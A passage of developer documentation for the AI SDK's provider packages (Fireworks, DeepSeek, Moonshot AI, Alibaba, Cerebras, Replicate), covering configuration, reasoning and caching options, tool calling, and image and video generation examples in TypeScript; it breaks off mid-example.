- apiKey string - API key that is being sent using the Authorization header. It defaults to the FIREWORKS_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation.
Language Models
You can create Fireworks models using a provider instance.
The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:
const model = fireworks('accounts/fireworks/models/firefunction-v1');
Reasoning Models
Fireworks exposes the thinking of deepseek-r1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
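For instance (a sketch that reuses enhancedModel from the snippet above):
import { generateText } from 'ai';

// The middleware strips the <think> block from the text and exposes it
// separately as reasoning on the result.
const { text, reasoningText } = await generateText({
  model: enhancedModel,
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log(reasoningText);
console.log(text);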
Example
You can use Fireworks language models to generate text with the generateText function:
import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';
const { text } = await generateText({
model: fireworks('accounts/fireworks/models/firefunction-v1'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Fireworks language models can also be used in the streamText function
(see AI SDK Core).
Provider Options
Fireworks chat models support additional provider options that are not part of
the standard call settings. You can pass them in the providerOptions argument:
import {
fireworks,
type FireworksLanguageModelOptions,
} from '@ai-sdk/fireworks';
import { generateText } from 'ai';
const { text, reasoningText } = await generateText({
model: fireworks('accounts/fireworks/models/kimi-k2p5'),
providerOptions: {
fireworks: {
thinking: { type: 'enabled', budgetTokens: 4096 },
reasoningHistory: 'interleaved',
} satisfies FireworksLanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
The following optional provider options are available for Fireworks chat models:
- thinking object - Configuration for thinking/reasoning models like Kimi K2.5.
  - type 'enabled' | 'disabled' - Whether to enable thinking mode.
  - budgetTokens number - Maximum number of tokens for thinking (minimum 1024).
- reasoningHistory 'disabled' | 'interleaved' | 'preserved' - Controls how reasoning history is handled in multi-turn conversations:
  - 'disabled': Remove reasoning from history
  - 'interleaved': Include reasoning between tool calls within a single turn
  - 'preserved': Keep all reasoning in history
Completion Models
You can create models that call the Fireworks completions API using the .completionModel() factory method:
const model = fireworks.completionModel(
'accounts/fireworks/models/firefunction-v1',
);
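Completion models can then be used with generateText like any other model (a sketch; they take a plain text prompt rather than chat messages):
import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text } = await generateText({
  model: fireworks.completionModel(
    'accounts/fireworks/models/firefunction-v1',
  ),
  prompt: 'Once upon a time,',
});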
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| accounts/fireworks/models/firefunction-v1 | | | | |
| accounts/fireworks/models/deepseek-r1 | | | | |
| accounts/fireworks/models/deepseek-v3 | | | | |
| accounts/fireworks/models/llama-v3p1-405b-instruct | | | | |
| accounts/fireworks/models/llama-v3p1-8b-instruct | | | | |
| accounts/fireworks/models/llama-v3p2-3b-instruct | | | | |
| accounts/fireworks/models/llama-v3p3-70b-instruct | | | | |
| accounts/fireworks/models/mixtral-8x7b-instruct | | | | |
| accounts/fireworks/models/mixtral-8x7b-instruct-hf | | | | |
| accounts/fireworks/models/mixtral-8x22b-instruct | | | | |
| accounts/fireworks/models/qwen2p5-coder-32b-instruct | | | | |
| accounts/fireworks/models/qwen2p5-72b-instruct | | | | |
| accounts/fireworks/models/qwen-qwq-32b-preview | | | | |
| accounts/fireworks/models/qwen2-vl-72b-instruct | | | | |
| accounts/fireworks/models/llama-v3p2-11b-vision-instruct | | | | |
| accounts/fireworks/models/qwq-32b | | | | |
| accounts/fireworks/models/yi-large | | | | |
| accounts/fireworks/models/kimi-k2-instruct | | | | |
| accounts/fireworks/models/kimi-k2-thinking | | | | |
| accounts/fireworks/models/kimi-k2p5 | | | | |
| accounts/fireworks/models/minimax-m2 | | | | |
Embedding Models
You can create models that call the Fireworks embeddings API using the .embeddingModel() factory method:
const model = fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5');
You can use Fireworks embedding models to generate embeddings with the embed function:
import { fireworks } from '@ai-sdk/fireworks';
import { embed } from 'ai';
const { embedding } = await embed({
model: fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| nomic-ai/nomic-embed-text-v1.5 | 768 | 8192 |
Image Models
You can create Fireworks image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { fireworks } from '@ai-sdk/fireworks';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Image Editing
Fireworks supports image editing through FLUX Kontext models (flux-kontext-pro and flux-kontext-max). Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { readFileSync } from 'node:fs';
import { fireworks } from '@ai-sdk/fireworks';
import { generateImage } from 'ai';

const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
providerOptions: {
fireworks: {
output_format: 'jpeg',
},
},
});
Style Transfer
Apply artistic styles to an image:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
prompt: {
text: 'Transform this into a watercolor painting style',
images: [imageBuffer],
},
aspectRatio: '1:1',
});
Model Capabilities
For all models supporting aspect ratios, the following aspect ratios are supported:
1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
For all models supporting size, the following sizes are supported:
640x1536, 768x1344, 832x1216, 896x1152, 1024x1024 (default), 1152x896, 1216x832, 1344x768, 1536x640
| Model | Dimensions Specification | Image Editing |
|---|---|---|
| accounts/fireworks/models/flux-kontext-pro | Aspect Ratio | |
| accounts/fireworks/models/flux-kontext-max | Aspect Ratio | |
| accounts/fireworks/models/flux-1-dev-fp8 | Aspect Ratio | |
| accounts/fireworks/models/flux-1-schnell-fp8 | Aspect Ratio | |
| accounts/fireworks/models/playground-v2-5-1024px-aesthetic | Size | |
| accounts/fireworks/models/japanese-stable-diffusion-xl | Size | |
| accounts/fireworks/models/playground-v2-1024px-aesthetic | Size | |
| accounts/fireworks/models/SSD-1B | Size | |
| accounts/fireworks/models/stable-diffusion-xl-1024-v1-0 | Size | |
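As a sketch, generating with a Size-based model (the dimensions must be one of the supported sizes listed above):
import { fireworks } from '@ai-sdk/fireworks';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/SSD-1B'),
  prompt: 'A watercolor hummingbird',
  size: '1152x896', // one of the supported sizes
});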
For more details, see the Fireworks models page.
Stability AI Models
Fireworks also offers several Stability AI models backed by Stability AI API keys and endpoints. The AI SDK Fireworks provider does not currently support these models:
| Model ID |
|---|
| accounts/stability/models/sd3-turbo |
| accounts/stability/models/sd3-medium |
| accounts/stability/models/sd3 |
title: DeepSeek description: Learn how to use DeepSeek's models with the AI SDK.
DeepSeek Provider
The DeepSeek provider offers access to powerful language models through the DeepSeek API.
API keys can be obtained from the DeepSeek Platform.
Setup
The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:
pnpm add @ai-sdk/deepseek
Provider Instance
You can import the default provider instance deepseek from @ai-sdk/deepseek:
import { deepseek } from '@ai-sdk/deepseek';
For custom configuration, you can import createDeepSeek and create a provider instance with your settings:
import { createDeepSeek } from '@ai-sdk/deepseek';
const deepseek = createDeepSeek({
apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepSeek provider instance:
- baseURL string - Use a different URL prefix for API calls. The default prefix is https://api.deepseek.com.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the DEEPSEEK_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chat() or .languageModel() factory methods:
const model = deepseek.chat('deepseek-chat');
// or
const model = deepseek.languageModel('deepseek-chat');
DeepSeek language models can be used in the streamText function
(see AI SDK Core).
The following optional provider options are available for DeepSeek models:
- thinking object - Optional. Controls thinking mode (chain-of-thought reasoning). You can enable thinking mode either by using the deepseek-reasoner model or by setting this option.
  - type 'enabled' | 'disabled' - Enable or disable thinking mode.
import { deepseek, type DeepSeekLanguageModelOptions } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text, reasoning } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'How many "r"s are in the word "strawberry"?',
providerOptions: {
deepseek: {
thinking: { type: 'enabled' },
} satisfies DeepSeekLanguageModelOptions,
},
});
Reasoning
DeepSeek has reasoning support for the deepseek-reasoner model. The reasoning is exposed through streaming:
import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';
const result = streamText({
model: deepseek('deepseek-reasoner'),
prompt: 'How many "r"s are in the word "strawberry"?',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
// This is the reasoning text
console.log('Reasoning:', part.text);
} else if (part.type === 'text') {
// This is the final answer
console.log('Answer:', part.text);
}
}
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Token Usage
DeepSeek provides context caching on disk technology that can significantly reduce token costs for repeated content. You can access the cache hit/miss metrics through the providerMetadata property in the response:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const result = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Your prompt here',
});
console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }
The metrics include:
- promptCacheHitTokens: Number of input tokens that were cached
- promptCacheMissTokens: Number of input tokens that were not cached
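As a sketch, continuing from the example above, the metrics can be read directly off the provider metadata:
const deepseekMetadata = result.providerMetadata?.deepseek;
console.log('cache hits:', deepseekMetadata?.promptCacheHitTokens);
console.log('cache misses:', deepseekMetadata?.promptCacheMissTokens);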
Model Capabilities
| Model | Text Generation | Object Generation | Image Input | Tool Usage | Tool Streaming |
|---|---|---|---|---|---|
| deepseek-chat | | | | | |
| deepseek-reasoner | | | | | |
title: Moonshot AI description: Learn how to use Moonshot AI models with the AI SDK.
Moonshot AI Provider
The Moonshot AI provider offers access to powerful language models through the Moonshot API, including the Kimi series of models with reasoning capabilities.
API keys can be obtained from the Moonshot Platform.
Setup
The Moonshot AI provider is available via the @ai-sdk/moonshotai module. You can install it with:
pnpm add @ai-sdk/moonshotai
Provider Instance
You can import the default provider instance moonshotai from @ai-sdk/moonshotai:
import { moonshotai } from '@ai-sdk/moonshotai';
For custom configuration, you can import createMoonshotAI and create a provider instance with your settings:
import { createMoonshotAI } from '@ai-sdk/moonshotai';
const moonshotai = createMoonshotAI({
apiKey: process.env.MOONSHOT_API_KEY ?? '',
});
You can use the following optional settings to customize the Moonshot AI provider instance:
- baseURL string - Use a different URL prefix for API calls. The default prefix is https://api.moonshot.ai/v1.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the MOONSHOT_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { moonshotai } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';
const { text } = await generateText({
model: moonshotai('kimi-k2.5'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chatModel() or .languageModel() factory methods:
const model = moonshotai.chatModel('kimi-k2.5');
// or
const model = moonshotai.languageModel('kimi-k2.5');
Moonshot AI language models can be used in the streamText function
(see AI SDK Core).
Reasoning Models
Moonshot AI offers thinking models like kimi-k2-thinking that generate intermediate reasoning tokens before their final response. The reasoning output is streamed through the standard AI SDK reasoning parts.
import {
moonshotai,
type MoonshotAILanguageModelOptions,
} from '@ai-sdk/moonshotai';
import { generateText } from 'ai';
const { text, reasoningText } = await generateText({
model: moonshotai('kimi-k2-thinking'),
providerOptions: {
moonshotai: {
thinking: { type: 'enabled', budgetTokens: 2048 },
reasoningHistory: 'interleaved',
} satisfies MoonshotAILanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log(reasoningText);
console.log(text);
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Provider Options
The following optional provider options are available for Moonshot AI language models:
- thinking object - Configuration for thinking/reasoning models like Kimi K2 Thinking.
  - type 'enabled' | 'disabled' - Whether to enable thinking mode.
  - budgetTokens number - Maximum number of tokens for thinking (minimum 1024).
- reasoningHistory 'disabled' | 'interleaved' | 'preserved' - Controls how reasoning history is handled in multi-turn conversations:
  - 'disabled': Remove reasoning from history
  - 'interleaved': Include reasoning between tool calls within a single turn
  - 'preserved': Keep all reasoning in history
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| moonshot-v1-8k | | | | |
| moonshot-v1-32k | | | | |
| moonshot-v1-128k | | | | |
| kimi-k2 | | | | |
| kimi-k2.5 | | | | |
| kimi-k2-thinking | | | | |
| kimi-k2-thinking-turbo | | | | |
| kimi-k2-turbo | | | | |
title: Alibaba description: Learn how to use Alibaba Cloud Model Studio (Qwen) models with the AI SDK.
Alibaba Provider
Alibaba Cloud Model Studio provides access to the Qwen model series, including advanced reasoning capabilities.
API keys can be obtained from the Console.
Setup
The Alibaba provider is available via the @ai-sdk/alibaba module. You can install it with:
pnpm add @ai-sdk/alibaba
Provider Instance
You can import the default provider instance alibaba from @ai-sdk/alibaba:
import { alibaba } from '@ai-sdk/alibaba';
For custom configuration, you can import createAlibaba and create a provider instance with your settings:
import { createAlibaba } from '@ai-sdk/alibaba';
const alibaba = createAlibaba({
apiKey: process.env.ALIBABA_API_KEY ?? '',
});
You can use the following optional settings to customize the Alibaba provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers or regional endpoints. The default prefix is https://dashscope-intl.aliyuncs.com/compatible-mode/v1.
- videoBaseURL string - Use a different URL prefix for video generation API calls. The video API uses the DashScope native endpoint (not the OpenAI-compatible endpoint). The default prefix is https://dashscope-intl.aliyuncs.com.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the ALIBABA_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation.
- includeUsage boolean - Include usage information in streaming responses. When enabled, token usage will be included in the final chunk. Defaults to true.
Language Models
You can create language models using a provider instance:
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text } = await generateText({
model: alibaba('qwen-plus'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .chatModel() or .languageModel() factory methods:
const model = alibaba.chatModel('qwen-plus');
// or
const model = alibaba.languageModel('qwen-plus');
Alibaba language models can be used in the streamText function
(see AI SDK Core).
The following optional provider options are available for Alibaba models:
- enableThinking boolean - Enable thinking/reasoning mode for supported models. When enabled, the model generates reasoning content before the response. Defaults to false.
- thinkingBudget number - Maximum number of reasoning tokens to generate. Limits the length of thinking content.
- parallelToolCalls boolean - Whether to enable parallel function calling during tool use. Defaults to true.
Thinking Mode
Alibaba's Qwen models support thinking/reasoning mode for complex problem-solving:
import { alibaba, type AlibabaLanguageModelOptions } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text, reasoning } = await generateText({
model: alibaba('qwen3-max'),
providerOptions: {
alibaba: {
enableThinking: true,
thinkingBudget: 2048,
} satisfies AlibabaLanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
console.log('Reasoning:', reasoning);
console.log('Answer:', text);
For models that are thinking-only (like qwen3-235b-a22b-thinking-2507), thinking mode is enabled by default.
Tool Calling
Alibaba models support tool calling with parallel execution:
import { alibaba } from '@ai-sdk/alibaba';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const { text } = await generateText({
model: alibaba('qwen-plus'),
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in San Francisco?',
});
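To force sequential tool calls instead, parallel execution can be disabled via provider options (a sketch; tool definitions are omitted for brevity):
import { alibaba, type AlibabaLanguageModelOptions } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text } = await generateText({
  model: alibaba('qwen-plus'),
  prompt: 'What is the weather in San Francisco and in Tokyo?',
  // tools: { ... } as in the example above
  providerOptions: {
    alibaba: {
      parallelToolCalls: false, // tools are invoked one at a time
    } satisfies AlibabaLanguageModelOptions,
  },
});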
Prompt Caching
Alibaba supports both implicit and explicit prompt caching to reduce costs for repeated prompts.
Implicit caching works automatically - the provider caches appropriate content without any configuration. For more control, you can use explicit caching by marking specific messages with cacheControl:
Single message cache control
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const { text, usage } = await generateText({
model: alibaba('qwen-plus'),
messages: [
{
role: 'system',
content: 'You are a helpful assistant. [... long system prompt ...]',
providerOptions: {
alibaba: {
cacheControl: { type: 'ephemeral' },
},
},
},
],
});
Multi-part message cache control
import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';
const longDocument = '... large document content ...';
const { text, usage } = await generateText({
model: alibaba('qwen-plus'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Context: Please analyze this document.',
},
{
type: 'text',
text: longDocument,
providerOptions: {
alibaba: {
cacheControl: { type: 'ephemeral' },
},
},
},
],
},
],
});
Note: The minimum content length for a cache block is 1,024 tokens.
Video Models
You can create Wan video models that call the Alibaba Cloud DashScope API
using the .video() factory method. For more on video generation with the AI SDK see generateVideo().
Alibaba supports three video generation modes: text-to-video, image-to-video (first frame), and reference-to-video.
Text-to-Video
Generate videos from text prompts:
import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: alibaba.video('wan2.6-t2v'),
prompt: 'A serene mountain lake at sunset with gentle ripples on the water.',
resolution: '1280x720',
duration: 5,
providerOptions: {
alibaba: {
promptExtend: true,
pollTimeoutMs: 600000, // 10 minutes
} satisfies AlibabaVideoModelOptions,
},
});
Image-to-Video
Generate videos from a first-frame image and optional text prompt:
import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: alibaba.video('wan2.6-i2v'),
prompt: {
image: 'https://example.com/landscape.jpg',
text: 'Camera slowly pans across the landscape',
},
duration: 5,
providerOptions: {
alibaba: {
pollTimeoutMs: 600000, // 10 minutes
} satisfies AlibabaVideoModelOptions,
},
});
Reference-to-Video
Generate videos using reference images and/or videos for character consistency. Use character identifiers
(character1, character2, etc.) in your prompt to reference them:
import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';
const { video } = await generateVideo({
model: alibaba.video('wan2.6-r2v-flash'),
prompt: 'character1 walks through a beautiful garden and waves at the camera',
resolution: '1280x720',
duration: 5,
providerOptions: {
alibaba: {
referenceUrls: ['https://example.com/character-reference.jpg'],
pollTimeoutMs: 600000, // 10 minutes
} satisfies AlibabaVideoModelOptions,
},
});
Video Provider Options
The following provider options are available via providerOptions.alibaba:
- negativePrompt string - A description of what to avoid in the generated video (max 500 characters).
- audioUrl string - URL to an audio file for audio-video sync (WAV/MP3, 3-30 seconds, max 15MB).
- promptExtend boolean - Enable prompt extension/rewriting for better generation quality. Defaults to true.
- shotType 'single' | 'multi' - Shot type for video generation. 'multi' enables multi-shot cinematic narrative (wan2.6 models only).
- watermark boolean - Whether to add a watermark to the generated video. Defaults to false.
- audio boolean - Whether to generate audio (for I2V and R2V models that support it).
- referenceUrls string[] - Array of reference image/video URLs for reference-to-video mode. Supports 0-5 images and 0-3 videos, max 5 total.
- pollIntervalMs number - Polling interval in milliseconds for checking task status. Defaults to 5000.
- pollTimeoutMs number - Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
Video Model Capabilities
Text-to-Video
| Model | Audio | Resolution | Duration |
|---|---|---|---|
| wan2.6-t2v | Yes | 720P, 1080P | 2-15s |
| wan2.5-t2v-preview | Yes | 480P, 720P, 1080P | 5s, 10s |
Image-to-Video (First Frame)
| Model | Audio | Resolution | Duration |
|---|---|---|---|
| wan2.6-i2v-flash | Optional | 720P, 1080P | 2-15s |
| wan2.6-i2v | Yes | 720P, 1080P | 2-15s |
Reference-to-Video
| Model | Audio | Resolution | Duration |
|---|---|---|---|
| wan2.6-r2v-flash | Optional | 720P, 1080P | 2-10s |
| wan2.6-r2v | Yes | 720P, 1080P | 2-10s |
Model Capabilities
Please see the Alibaba Cloud Model Studio docs for a full list of available models. You can also pass any available provider model ID as a string if needed.
title: Cerebras description: Learn how to use Cerebras's models with the AI SDK.
Cerebras Provider
The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.
API keys can be obtained from the Cerebras Platform.
Setup
The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:
pnpm add @ai-sdk/cerebras
Provider Instance
You can import the default provider instance cerebras from @ai-sdk/cerebras:
import { cerebras } from '@ai-sdk/cerebras';
For custom configuration, you can import createCerebras and create a provider instance with your settings:
import { createCerebras } from '@ai-sdk/cerebras';
const cerebras = createCerebras({
apiKey: process.env.CEREBRAS_API_KEY ?? '',
});
You can use the following optional settings to customize the Cerebras provider instance:
- baseURL string - Use a different URL prefix for API calls. The default prefix is https://api.cerebras.ai/v1.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the CEREBRAS_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';
const { text } = await generateText({
model: cerebras('llama3.1-8b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cerebras language models can be used in the streamText function
(see AI SDK Core).
You can create Cerebras language models using a provider instance. The first argument is the model ID, e.g. llama-3.3-70b:
const model = cerebras('llama-3.3-70b');
You can also use the .languageModel() and .chat() methods:
const model = cerebras.languageModel('llama-3.3-70b');
const model = cerebras.chat('llama-3.3-70b');
Reasoning Models
Cerebras offers several reasoning models including gpt-oss-120b, qwen-3-32b, and zai-glm-4.7 that generate intermediate thinking tokens before their final response. The reasoning output is streamed through the standard AI SDK reasoning parts.
For gpt-oss-120b, you can control the reasoning depth using the reasoningEffort provider option:
import { cerebras } from '@ai-sdk/cerebras';
import { streamText } from 'ai';
const result = streamText({
model: cerebras('gpt-oss-120b'),
providerOptions: {
cerebras: {
reasoningEffort: 'medium',
},
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log('Reasoning:', part.text);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Provider Options
The following optional provider options are available for Cerebras language models:
- reasoningEffort 'low' | 'medium' | 'high' - Controls the depth of reasoning for GPT-OSS models. Defaults to 'medium'.
- user string - A unique identifier representing your end-user, which can help with monitoring and abuse detection.
- strictJsonSchema boolean - Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance. Defaults to true.
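For example, tagging requests with an end-user identifier (the ID below is illustrative):
import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cerebras('llama-3.3-70b'),
  prompt: 'Summarize wafer-scale inference in one sentence.',
  providerOptions: {
    cerebras: {
      user: 'user-1234', // helps with monitoring and abuse detection
    },
  },
});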
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Reasoning |
|---|---|---|---|---|---|
| llama3.1-8b | | | | | |
| llama-3.3-70b | | | | | |
| gpt-oss-120b | | | | | |
| qwen-3-32b | | | | | |
| qwen-3-235b-a22b-instruct-2507 | | | | | |
| qwen-3-235b-a22b-thinking-2507 | | | | | |
| zai-glm-4.6 | | | | | |
| zai-glm-4.7 | | | | | |
title: Replicate description: Learn how to use Replicate models with the AI SDK.
Replicate Provider
Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.
Setup
The Replicate provider is available via the @ai-sdk/replicate module. You can install it with
pnpm add @ai-sdk/replicate
Provider Instance
You can import the default provider instance replicate from @ai-sdk/replicate:
import { replicate } from '@ai-sdk/replicate';
If you need a customized setup, you can import createReplicate from @ai-sdk/replicate
and create a provider instance with your settings:
import { createReplicate } from '@ai-sdk/replicate';
const replicate = createReplicate({
apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});
You can use the following optional settings to customize the Replicate provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.replicate.com/v1.
- apiToken string - API token that is being sent using the Authorization header. It defaults to the REPLICATE_API_TOKEN environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation.
Image Models
You can create Replicate image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Supported Image Models
The following image models are currently supported by the Replicate provider:
Text-to-Image Models:
- black-forest-labs/flux-1.1-pro-ultra
- black-forest-labs/flux-1.1-pro
- black-forest-labs/flux-dev
- black-forest-labs/flux-pro
- black-forest-labs/flux-schnell
- bytedance/sdxl-lightning-4step
- fofr/aura-flow
- fofr/latent-consistency-model
- fofr/realvisxl-v3-multi-controlnet-lora
- fofr/sdxl-emoji
- fofr/sdxl-multi-controlnet-lora
- ideogram-ai/ideogram-v2-turbo
- ideogram-ai/ideogram-v2
- lucataco/dreamshaper-xl-turbo
- lucataco/open-dalle-v1.1
- lucataco/realvisxl-v2.0
- lucataco/realvisxl2-lcm
- luma/photon-flash
- luma/photon
- nvidia/sana
- playgroundai/playground-v2.5-1024px-aesthetic
- recraft-ai/recraft-v3-svg
- recraft-ai/recraft-v3
- stability-ai/stable-diffusion-3.5-large-turbo
- stability-ai/stable-diffusion-3.5-large
- stability-ai/stable-diffusion-3.5-medium
- tstramer/material-diffusion
Inpainting and Image Editing Models:
Flux-2 Models (Multi-Reference Image Generation):
These models support up to 8 input reference images for style transfer and composition:
You can also use versioned models.
The id for versioned models is the Replicate model id followed by a colon and the version ID ($modelId:$versionId), e.g.
bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637.
Basic Usage
import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';
const { image } = await generateImage({
model: replicate.image('black-forest-labs/flux-schnell'),
prompt: 'The Loch Ness Monster getting a manicure',
aspectRatio: '16:9',
});
await writeFile('image.webp', image.uint8Array);
console.log('Image saved as image.webp');
Model-specific options
import { replicate, type ReplicateImageModelOptions } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image('recraft-ai/recraft-v3'),
prompt: 'The Loch Ness Monster getting a manicure',
size: '1365x1024',
providerOptions: {
replicate: {
style: 'realistic_image',
} satisfies ReplicateImageModelOptions,
},
});
Versioned Models
import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image(
'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
),
prompt: 'The Loch Ness Monster getting a manicure',
});
Image Editing
Replicate supports image editing through various models. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { readFileSync } from 'node:fs';
import { replicate, type ReplicateImageModelOptions } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: replicate.image('black-forest-labs/flux-fill-dev'),
prompt: {
text: 'Turn the cat into a golden retriever dog',
images: [imageBuffer],
},
providerOptions: {
replicate: {
guidance_scale: 7.5,
num_inference_steps: 30,
} satisfies ReplicateImageModelOptions,
},
});
Inpainting with Mask
Edit specific parts of an image using a mask. For FLUX Fill models, white areas in the mask indicate where the image should be edited:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White = inpaint, black = keep
const { images } = await generateImage({
model: replicate.image('black-forest-labs/flux-fill-pro'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
providerOptions: {
replicate: {
guidance_scale: 7.5,
num_inference_steps: 30,
} satisfies ReplicateImageModelOptions,
},
});
Multi-Reference Image Generation (Flux-2)
Flux-2 models support up to 8 input reference images for style transfer, composition, and multi-subject generation:
import { readFileSync } from 'node:fs';
import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
const reference1 = readFileSync('./style-reference.png');
const reference2 = readFileSync('./subject-reference.png');
const { images } = await generateImage({
